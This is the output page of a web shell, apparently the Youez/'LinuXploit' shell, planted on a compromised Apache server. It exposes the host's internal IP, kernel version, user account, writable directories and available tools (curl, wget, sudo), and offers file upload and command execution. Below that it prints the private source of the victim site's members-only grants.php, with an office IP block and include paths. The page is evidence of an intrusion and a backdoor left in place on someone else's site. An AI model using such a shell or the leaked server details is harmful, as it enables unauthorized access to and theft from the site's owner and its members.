403Webshell
Server IP : 10.200.247.200  /  Your IP : 216.73.217.19
Web Server : Apache
System : Linux synergy-usa-sites 6.8.0-138-generic #138-Ubuntu SMP PREEMPT_DYNAMIC Fri Jul 31 22:41:49 UTC 2026 x86_64
User : jeremy ( 1001)
PHP Version : 8.4.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/usa_sites/fundingapplications.com/membersonly/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/usa_sites/fundingapplications.com/membersonly/grants.php
<?php
session_start();
if(strstr($_SERVER['REMOTE_ADDR'],'74.211.31') !== false) {
	die(); //74.211.31.213 dustin's office ip
}
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/globals.php');  
require_once($_SERVER['DOCUMENT_ROOT'].'/inc/AuthLCAPI.php');

//Member Authentication Object
$auth = new AuthLCAPI;

if(!$auth->isLoggedIn()) {
	header('location: '.$auth->loginPageUrl);
	exit();
} 
	$body_id = 'member_side';
?>
<?php include($_SERVER['DOCUMENT_ROOT'].'/header.php');?>
<table border="0" cellspacing="0" cellpadding="10" style="background:white;">
	<tr>
		<td style="width:200px;vertical-align:top;">
			<?php include($_SERVER['DOCUMENT_ROOT'].'/membersonly/nav.php');?>
		</td>
		<td style="vertical-align:top;">
    <h1>What kind of Grant are you looking for?</h1>
    
    <p>Grants come in all shapes and sizes. Government and State grants are typically awarded annually to qualfied applicants and originate in tax revenues. Private Grants and Scholarships, on the other hand, often come from local groups, corporations, and institutions as charitable donations and to gain tax credits. Learn more about each of the different kinds of Grant Types available by clicking on the links below.</p>
    
    <a href="/membersonly/grants/federal.php" title="Federal Grants"><img src="/membersonly/images/img-fede.gif" width="234px" height="163px" style="margin:20px; float:left" border="0" /></a>
    <a href="/membersonly/grants/state.php" title="State Grants"><img src="/membersonly/images/img-stat.gif" width="234px" height="163px" style="margin:20px; float:left" border="0" /></a>
    <!--<a href="/membersonly/grants/private.php" title="Private Grants"><img src="/membersonly/images/img-priv.gif" width="234px" height="163px" style="margin:20px; float:left" border="0" /></a>-->
    <a href="/membersonly/grants/scholarships.php" title="Scholarships"><img src="/membersonly/images/img-scho.gif" width="234px" height="163px" style="margin:20px; float:left" border="0" /></a>
		</td>
	</tr>
</table>
    


<?include('footer.php');?>

Youez - 2016 - github.com/yon3zu
LinuXploit